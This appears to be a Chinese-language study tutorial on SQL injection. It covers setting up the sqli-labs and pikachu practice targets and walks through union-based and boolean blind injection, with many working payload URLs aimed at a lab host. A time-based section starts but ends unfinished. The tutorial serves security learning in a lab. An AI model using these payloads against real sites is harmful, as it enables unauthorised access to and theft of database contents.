SQL注入

注入是web安全的头号大敌。注入攻击漏洞往往是应用程序缺少对输入进行安全性检查所引起的。攻击者把一些包含攻击代码当做命令或者查询语句发送给解释器，这些恶意数据可以欺骗解释器，从而执行计划外的命令或者未授权访问数据。注入漏洞通常能sql查询，ldap查询，os命令，程序参数等中出现。

SQL注入常用函数

version() #数据库版本
database() 当前数据库名
user() 用户名
current_user() 当前用户名
system_user() 系统用户名
@@datadir 数据库路径
@@version_compile_os 操作系统版本
# 字符串函数
length() # 返回字符串长度
mid() left() right() substr() # 截取字符串
concat() # 没有分隔符连接字符串
concat_ws() # 含有分隔符连接字符串
group_concat() # 连接一个组的字符串
ord() # 返回ASCII码
ascii() # 字符转ascii码
md5() #返回md5值
floor(x) # 不大于x的最大整数
round(x) # 返回参数x接近的整数
rand(x) # 0-1之间的随机浮点数
sleep() #睡眠时间
if(true,t,f) # IF
# 重要的数据库
information_schema # 包含mysql中所有数据库信息
# 重要的表
schemate # mysql中所有数据库的信息
  schema_name #所有的数据库名
tables # 数据库表中的信息
  table_name #记录数据表名
columns #列信息
  column_name #字段名

示例：

use `security`;
# 查询mysql 中的所有数据库
# 结果 ：information_schema,challenges,dvwa,mysql,performance_schema,security,test
select GROUP_CONCAT(SCHEMA_NAME ) from information_schema.SCHEMATA ;
# 查询 security数据库中的所有表
# 结果：emails,referers,uagents,users
select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA = database();
# 查询security数据库中users表的的字段信息
# 结果：id,username,password
select GROUP_CONCAT(column_name) from information_schema.COLUMNS where TABLE_SCHEMA= database() and table_name='users';

注入流程

1 使用单引号判断是字符型还是数字型
类型选择
2  有显示位：union
3  无显示位：但是网页会根据代码而改变： 布尔盲注
4  无显示位，网页也不会变化，具体看网站的回显时间：时间盲注

注入检测

一、字符型检测（Less-1）

源SQL：$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

在url后拼接单引号

# Less-1
# url编码： %27表示'
# 页面不出现sql错误，则可以注入
http://10.196.93.56/sqli-labs/Less-1/?id=3%27

url拼接通用条件

# Less-1
# -- - 表示mysql注释信息
# and 1=1 （通用条件，永远为True）
http://10.196.93.56/sqli-labs/Less-1/?id=1 ' and 1=1 -- -
# 或
http://10.196.93.56/sqli-labs/Less-1/?id=' or 1=1 -- -

二、数字型注入检测（Less-2）

源SQL：$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

# 拼接单引号
http://10.196.93.56/sqli-labs/Less-2/?id=1’
# 结果：报错 
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
# 添加注释信息
http://10.196.93.56/sqli-labs/Less-2/?id=1 -- -
# 结果：成功
# 数字型
http://10.196.93.56/sqli-labs/Less-2/?id=1 or 1=1
# 结果：成功

三、搜索型注入探测

四、xx型注入探测

sqli-labs靶场搭建

下载地址：https://github.com/Audi-1/sqli-labs
下载完成后将文件夹放入到Apache根目录中。

例如：E:\PHP\httpd-2.4.59-240605-win64-VS17\Apache24\htdocs\sqli-labs
sqli-labs为靶机目录
访问：http://localhost:8099/sqli-labs/index.html

修改数据库配置：

# 位置：E:\PHP\httpd-2.4.59-240605-win64-VS17\Apache24\htdocs\sqli-labs\sql-connections\db-creds.inc
# 修改数据库连接信息
<?php
  //give your mysql connection username n password
$dbuser ='root';
$dbpass ='root';
$dbname ="security";
$host = '127.0.0.1';
$dbname1 = "challenges";
?>

网站初始化

进入到页面，点击setup连接

若失败可能原因：

mysql版本太高，切换到5点几版本
php版本使用7以下
没有配置数据库信息

初始化成功页面

pikachu漏洞平台搭建

下载地址：https://github.com/zhuifengshaonianhanlu/pikachu
部署：下载后解压放入到Apachewww目录中，并导入数据库到mysql中。
初始化：

union注入

关键字union,作用就是将多条查询语句的结果合并成一个结果集。

一、查询示例

# mysql 两种注释方法：# 和--
# 两种注释方法都是单行注释，如果换行了注释则不生效。
use `security`;
select * from users where 1=1 #
union select 1,1,2 ;
# 结果 
// 1  Dumb  Dumb
// 2  Angelina  I-kill-you
// 3  Dummy p@ssword
// 4  secure  crappy
// 5  stupid  stupidity
// 6  superman  genious
// 7  batman  mob!le
// 8  admin admin
// 1  1 2

二、判断列数（Less-1）

# 使用order by 或group by
# 从1开始，直到报错，即可知道列数
http://10.196.93.56/sqli-labs/Less-1/?id=1' order by 4 -- 
# 返回结果：Unknown column '4' in 'order clause'
http://10.196.93.56/sqli-labs/Less-1/?id=1' order by 3 -- 
#返回结果：正常

三：union注入（Less-1）

显示位判断

# 让前一条sql语句查询不到值，从而从后面的sql语句显示在页面上
http://10.196.93.56/sqli-labs/Less-1/?id=3333' union select 1,2,3 --

查询数据库当前用户

http://10.196.93.56/sqli-labs/Less-1/?id=-1' union select 1,user(),3  -- -

查询当前数据库

http://10.196.93.56/sqli-labs/Less-1/?id=-1' union select 1,database(),3  -- -

查询mysql中的所有数据库

方法一：limit

# 数据库：information_schema
# 查询所有数据库语句
# select SCHEMA_NAME from information_schema.SCHEMATA 
# 因为页面只显示一条数据，所以使用limit 来切换数据
http://10.196.93.56/sqli-labs/Less-1/?id=-1' union select 1, (select SCHEMA_NAME from information_schema.SCHEMATA limit 2,1) ,3  -- -
# 使用字符串连接符：group_concat()

方法二：group_concat()

# 使用GROUP_CONCAT()方法将查询的数据连接成一行
# select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA 
http://10.196.93.56/sqli-labs/Less-1/?id=-1' union select 1, (select  GROUP_CONCAT(SCHEMA_NAME ) from information_schema.SCHEMATA ) ,3  -- -

查询security数据库中的表名字

# 查询 security数据库中的所有表
select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA = 'security';
#或 database() 表示当前数据库
select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA = database();
# 注入
http://10.196.93.56/sqli-labs/Less-1/?id=-1' union select 1, (select group_concat(table_name) tables from information_schema.TABLES where TABLE_SCHEMA = 'security') ,3  -- -

查询security数据库中users表的的字段信息

# sql语句
select GROUP_CONCAT(column_name) from information_schema.COLUMNS where TABLE_SCHEMA= database() and table_name='users';
# 注入
http://10.196.93.56/sqli-labs/Less-1/?id=-1' union select 1,(select GROUP_CONCAT(column_name) from information_schema.COLUMNS where TABLE_SCHEMA= database() and table_name='users'),3  -- -

SQL盲注

模拟环境：Less-1 、Less-8

修改页面：

一、概述

盲注是指在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入，盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。

二、布尔盲注

需要用到的sql函数

length() # 字符长度
Substr() # 截取字符
ascii()  # 返回ascii编码
sleep(n) # 睡眠
if(条件,True,False) #判断

是否能注入判断方法（都是使用单引号判断）

源SQL:"SELECT * FROM users WHERE id='$id' LIMIT 0,1"

http://10.196.93.56/sqli-labs/Less-1/?id=1' --

猜测出数据库的长度位数

# 通过多次查看显示的值来判断数据库的长度
# 结果：8
SELECT * FROM users WHERE id= '1' and length(database())=8  LIMIT 0,1
# 注入：
http://10.196.93.56/sqli-labs/Less-1/?id=1'  and length(database())=8 --

猜测当前数据库的名称

# 通过将substr()函数分别截取名称字符，在将字符转为ascill码，通过数字判断进行爆破
# 结果为：115
select ascii(substr( database(),1,1))
#sql 
use security;
select * from users where id ='1' and ascii(substr(database(),1,1)) =115
# 注入
http://10.196.93.56/sqli-labs/Less-1/?id=' or ascii(substr(database(),1,1)) =115 --

使用burp 进行数据库名称爆破

抓包并发送到爆破模块

选择各种组合模式并设置变量

url:/sqli-labs/Less-1/?id=%27or%20substr(database(),§1§,1)=%20"§s§"%20%20%23

变量1设置

变量s设置

开始爆破

长度为890的则为正确字符，通过组合则可以得到真实数据库名称

查询security 数据库中有多少张表

4张

#sql 
select * from security.users where id ='1' and (select count(*) from information_schema.tables where `TABLES`.table_schema ='security')=4 --
#注入
http://10.196.93.67/sqli-labs/Less-1/?id=1 ' and   (select count(*) from information_schema.tables where `TABLES`.table_schema ='security')=4 --

查询数据库中的表名

emails/referers/uagents/users

# sql
select * from security.users where id ='1'  and substr((select table_name from information_schema.tables where `TABLES`.table_schema ='security' limit 0,1),2,1)="e" --
# 注入
http://10.196.93.67/sqli-labs/Less-1/?id= ' or  substr((select table_name from information_schema.tables where `TABLES`.table_schema ='security' limit 0,1),1,1)="e" --

查询emails表的字段长度

字段个数

# sql
select * from `security`.users where id="1" and (select count(*) from information_schema.`COLUMNS` where TABLE_NAME='emails') =2 -- 
# 注入
http://10.196.93.67/sqli-labs/Less-1/?id=1 ' and  (select count(*) from information_schema.`COLUMNS` where TABLE_NAME='emails') =2 --

查询emails表的字段名

id ......

# sql
select * from `security`.users where id="1" and substr((select COLUMN_NAME from information_schema.`COLUMNS` where TABLE_NAME='emails' limit 0,1),1,1)='i' --
# 注入
http://10.196.93.67/sqli-labs/Less-1/?id=1 ' and substr((select COLUMN_NAME from information_schema.`COLUMNS` where TABLE_NAME='emails' limit 0,1),1,1)='i' --

三、时间盲注

模拟环境：Less-9

概述

延迟注入，一种盲注的手法，提交对执行时间敏感的sql语句，通过执行时间的长短来判断是否执行成功。

时间注入函数

sleep()
if()
ascii()
substring()
length()
mid()

Less-9

源SQL：SELECT * FROM users WHERE id='$id' LIMIT 0,1

SQL注入-上篇